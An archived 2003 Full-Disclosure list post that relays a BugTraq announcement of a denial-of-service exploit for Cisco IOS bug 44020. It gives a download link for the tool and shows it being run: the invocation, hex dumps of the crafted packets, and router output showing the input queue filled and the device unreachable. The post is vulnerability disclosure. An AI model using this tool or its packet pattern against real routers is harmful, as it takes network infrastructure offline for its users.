[Full-Disclosure] Cisco Bug 44020

From: Shanphen Dawa (list_at_hardlined.com)
Date: 07/22/03

  • Next message: Steve: "Re: [Full-Disclosure] Immature blabla / cisco exploit"
    To: full-disclosure@lists.netsys.com
    Date: Tue, 22 Jul 2003 12:44:39 -0500
    
    

    Here is supposedly a working Cisco exploit:
    http://www.elxsi.de/cisco-bug-44020.tar.gz
    This is pasted from security focus:
    http://www.securityfocus.com/archive/1/329765/2003-07-19/2003-07-25/0
    To:
    BugTraq

    Subject:
    Cisco IOS exploit (44020)

    Date:
    Jul 21 2003 4:01PM

    Author:
    Martin Kluge <martin elxsi de>

    Message-ID:
    <20030721160132.GA61689@elxsi.de>

    Hi,

    I'd like to submit a DoS attack against the recently found bug in
    almost all Cisco IOS versions (Cisco document ID 44020).

    The exploit can be found here (and it is included as attachment):

    http://www.elxsi.de/cisco-bug-44020.tar.gz

    This exploit is NOT broken (like the shadowchode.tar.gz exploit for example):

    Example:

    bash-2.05b# telnet 192.168.1.123
    Trying 192.168.1.123...
    Connected to 192.168.1.123.
    Escape character is '^]'.

    User Access Verification

    Username: 103
    Password: ******

    1003>show version
    IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc1)
    Copyright (c) 1986-2002 by cisco Systems, Inc.
    Compiled Mon 01-Apr-02 19:36 by srani
    Image text-base: 0x02004000, data-base: 0x0259733C

    ROM: System Bootstrap, Version 5.3.2(9) [vatran 9], RELEASE SOFTWARE (fc1)
    BOOTFLASH: 1000 Bootstrap Software (C1000-RBOOT-R), Version 10.3(9), RELEASE SOFTWARE
    (fc1)

    1003 uptime is 6 minutes
    System restarted by power-on
    System image file is "flash:c1000-bnsy56-mz.120-22.bin"

    cisco 1000 (68360) processor (revision D) with 15872K/512K bytes of memory.
    Processor board ID 03305903
    Bridging software.
    X.25 software, Version 3.0.0.
    Basic Rate ISDN software, Version 1.1.
    1 Ethernet/IEEE 802.3 interface(s)
    1 ISDN Basic Rate interface(s)
    7K bytes of non-volatile configuration memory.

    bash-2.05b#./cisco-bug-44020 192.168.1.1 192.168.1.123 1 0
    DEBUG: Hops: 1
    DEBUG: Protocol: 53
    DEBUG: Checksum: 47299
    DEBUG: 45 10 00 14 32 20 40 00 01 35 c3 b8 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 55
    DEBUG: Checksum: 61909
    DEBUG: 45 10 00 14 1f e5 40 00 01 37 d5 f1 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 55
    DEBUG: Checksum: 55515
    DEBUG: 45 10 00 14 19 fe 40 00 01 37 db d8 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 53
    DEBUG: Checksum: 10618
    DEBUG: 45 10 00 14 7b af 40 00 01 35 7a 29 c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    DEBUG: Protocol: 77
    DEBUG: Checksum: 40137
    DEBUG: 45 10 00 14 2c 24 40 00 01 4d c9 9c c0 a8 01 01 c0 a8 01 7b
    DEBUG: Wrote 20 bytes.
    <snip>
    ...
    <snip>
    bash-2.05b# telnet 192.168.1.123
    Trying 192.168.1.123...
    telnet: Unable to connect to remote host: No route to host

    If I login via term, I can see the following:

    Press RETURN to get started!

    00:00:30: %LINK-3-UPDOWN: Interface Ethernet0, changed state to up
    00:00:32: %LINEPROTO-5-UPDOWN: Line protocol on Interface Ethernet0, changed stp
    00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:1, changed staten
    00:00:35: %LINEPROTO-5-UPDOWN: Line protocol on Interface BRI0:2, changed staten
    00:00:39: %SYS-5-CONFIG_I: Configured from memory by console
    00:00:39: %SYS-5-RESTART: System restarted --
    Cisco Internetwork Operating System Software
    IOS (tm) 1000 Software (C1000-BNSY56-M), Version 12.0(22), RELEASE SOFTWARE (fc)
    Copyright (c) 1986-2002 by cisco Systems, Inc.
    Compiled Mon 01-Apr-02 19:36 by srani
    00:00:40: %LINK-3-UPDOWN: Interface BRI0, changed state to up
    1003>en
    Password: ******
    1003#show Interfaces Ethernet 0
    Ethernet0 is up, line protocol is up
      Hardware is QUICC Ethernet, address is 0060.7062.5727 (bia 0060.7062.5727)
      Internet address is 192.168.1.123/24
      MTU 1500 bytes, BW 10000 Kbit, DLY 1000 usec, rely 255/255, load 1/255
      Encapsulation ARPA, loopback not set, keepalive set (10 sec)
      ARP type: ARPA, ARP Timeout 04:00:00
      Last input 00:02:04, output 00:00:04, output hang never
      Last clearing of "show interface" counters never
      Input queue: 75/75/0/0 (size/max/drops/flushes); Total output drops: 0
                   ^^
                   ||
                   The input queue is full :)

    Cheers,
    Martin Kluge

    --
    Name      : Martin Kluge
    email     : martin elxsi info
    Phone     : +49 160 1515182
    Projects  : http://www.aa-security.de
    GPG Key   : http://www.elxsi.de/key.pub
    I haven't had a chance to try it yet, let me know if you guys get anything out of it.
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    

  • Next message: Steve: "Re: [Full-Disclosure] Immature blabla / cisco exploit"